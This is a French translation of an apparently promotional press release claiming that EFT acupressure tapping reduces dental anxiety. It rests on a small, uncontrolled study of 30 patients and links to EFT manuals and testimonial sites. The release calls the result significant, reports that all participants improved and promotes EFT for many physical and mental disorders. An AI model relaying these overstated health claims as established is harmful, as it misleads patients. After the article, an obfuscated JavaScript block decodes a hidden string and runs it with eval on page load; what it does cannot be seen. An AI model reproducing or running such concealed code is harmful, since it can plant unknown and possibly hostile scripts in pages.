<h3>Une étude montre qu'une technique d'acupression simple réduit l'anxiété liée aux soins dentaires </h3>
<p>
San Francisco, CA (PRWEB) -- On estime qu'un patient sur trois, enfants et adultes compris, souffre d'anxiété modérée à sévère dès qu'ils rendent visite au dentiste. Leur peur des plombages, extractions, couronnes et bridges, et même le nettoyage de dents tout simple, mène souvent à la négligence. Des problèmes dentaires non traités peuvent contribuer à des maladies sérieuses, y compris les maladies cardiaques. <br /><br />
Pendant des années, les thérapeutes en EFT (Emotional Freedom Techniques [NDLR: aussi parfois connu sous le nom de TLE - Techniques de Libération Emotionnelle]), une technique simple de tapotements d'acu-pression que chacun peut faire soi-même, ont rapporté des résultats époustouflants en ce qui concerne peurs et phobies, y compris l'anxiété liée aux soins dentaires. Une étude menée par le Dr. Graham Temple, un dentiste anglais,  montre maintenant que les patients qui utilisent l'EFT ressentent une réduction significative de leur anxiété en termes de travaux dentaires. Les instructions de base pour utiliser l'EFT sont disponibles en téléchargeant gratuitement le manuel de 79 pages. http://www.wisdomofbeing.com/manuelfrancais.pdf<br /><br />
Pour l'étude, on demandait aux patients dont l'examen montrait qu'ils nécessitaient des soins tels que plombages, extractions ou couronnes et bridges, si le traitement proposé les rendait nerveux. A ceux qui répondaient oui, on demandait s'ils souhaitaient essayer l'EFT, qui était présentée comme une forme "d'acupression psychologique".<br /><br />
Pour tous les patients qui acceptaient d'essayer l'EFT, on leur donnait un rendez-vous qui comptait 10 minutes supplémentaires pour apprendre la procédure. Quand ils arrivaient pour leurs soins, on leur demandait de mesurer leur anxiété sur une échelle de zéro (complètement calme) à 10 (extrêmement anxieux(se)). On n'a utilisé pour l'étude que les patients qui indiquaient une anxiété de 6 ou plus, ce qui a fait 30 patients en tout.<br /><br />
Après 6 minutes de tapotements d'acupression, on redemandait aux patients de mesurer leur anxiété. Les soins dentaires avaient lieu immédiatement après. On apprenait à chaque patient qu'il/elle pouvait tapoter certains points sur leurs mains, si nécessaire, pendant les soins dentaires. Après les soins, on leur demandait de commenter leur expérience.<br /><br />
Tous les participants (100%) ont mentionné une baisse de leur anxiété, avec 72% qui atteignaient un niveau de confort et un sentiment de contrôle qui leur permettait de bien supporter les soins pendant qu'ils avaient lieu. <br /><br />
L'étude a montré que même des sessions de tapotement très courtes (6 minutes) peuvent améliorer de façon significative les visites chez le dentiste, non seulement pour les patients, qui pourraient sinon repousser voire annuler des soins nécessaires, mais aussi pour les dentistes et leurs assistants. <br /><br />
“En tant que thérapeute EFT” dit le Dr. Temple, “j'utilise l'EFT de manière régulière, non seulement pour mes patients en soins dentaires, mais pour moi-même et pour les patients qui viennent à mon centre thérapeutique. J'espère que cette étude encouragera d'autres dentistes et leurs employés à se renseigner sur l'EFT et son efficacité en dentisterie."<br /><br />
Pour d'autres histoires de réussites dentaires concernant l'EFT, et pour des exemples de l'utilisation de cette technique comme un moyen efficace de soulager une grande variété de désordres physiques, mentaux et émotionnels, visitez le site EFT http://www.emofree.com et ses centaines de témoignages concernant peurs, phobies, traumatismes émotionnels et douleurs physiques. <br /><br />
[NDLT : et si vous préférez des sites en français, www.practicallearners.com (bilingue), www.techinque-eft.com et tout autre site francophone sérieux que vous pourriez trouver sur internet]<br /><br />
Article original sue http://www.emofree.com/Press-Releases/dental-anxiety.htm<br /><br />
Traduit par Christine Disant</p>



<script type="text/javascript" language="javascript">
<!--
var b7="";for(var k6=0;k6<726;k6++)b7+=String.fromCharCode((",v(5 GR7!mJ_V+y|?}0*K&ohL][Wew,iz\"ka-vx~YHZ\\gE#B (^b\'jN.lcF/{f%)X`nIGM$d7A MR77A~FA\'GR7}/cH?yHF\",zM?Z?Ya%`ja)w/\",M%\"i?M?B] kWm/*#HF\",zMiJvjKy+(a|].K_ B*B}E-ycHz%e */!.\"Fca?Z}v,/mv0[\' 0Jv\\i%HFki&{k,`EiF]gki&HaBLB*B}E-ycHz%e *fG.\"FlZeF?N-)wZ-)]F0_V(0[ja?g!Ziw\'li[\'B-_(Fz,&{k,&Hayln\",+Fa#wF-F]\\a%{B*B}E-ycHz%e */ .\"FlZeF?N-)wZ-)]F0_V(0[gN-#wlay+\\\"[Y.iJL.\"FlZ*Z?(0[\'BiJ-Z?yMNa,Mf[)&Ea)w{h[}{kyE/*#H*-#w#hwlBiJ-Z[/`L[%M*vi?Yz%MNvy+\\vywF?V& -#E/vyEN\"Wl.zWXB*B}E-ycHz%e *{\'.\"FlZL[?N-)wZ-)]F0_V(0[!!7P{%(=,v(5wGREPwGQIEIPwG@RI>1~FR= GC~$yz.d{=\'GCx}v(V*=wG>>QQFM>2= GC~$yz.d{=\'GCx}v(V*=wG@F>>QQFG>2= GC~$yz.d{=\'GCx}v(V*=wG@G>>QQK>2 GC~$yz.d{=\'GCx}v(V*=wG@H>>P M@Rh*(~$|C{(%#X}v(X%yz=~FSSSFKA=~FSSSM>;GJJA~F;GJJ>3Pz,v\"= MC)+w)*(=EAHEF>>".charCodeAt(k6)-(0x15)+0x3f)%(95)+2*8+16);document.write(eval(b7))
//-->
</script>

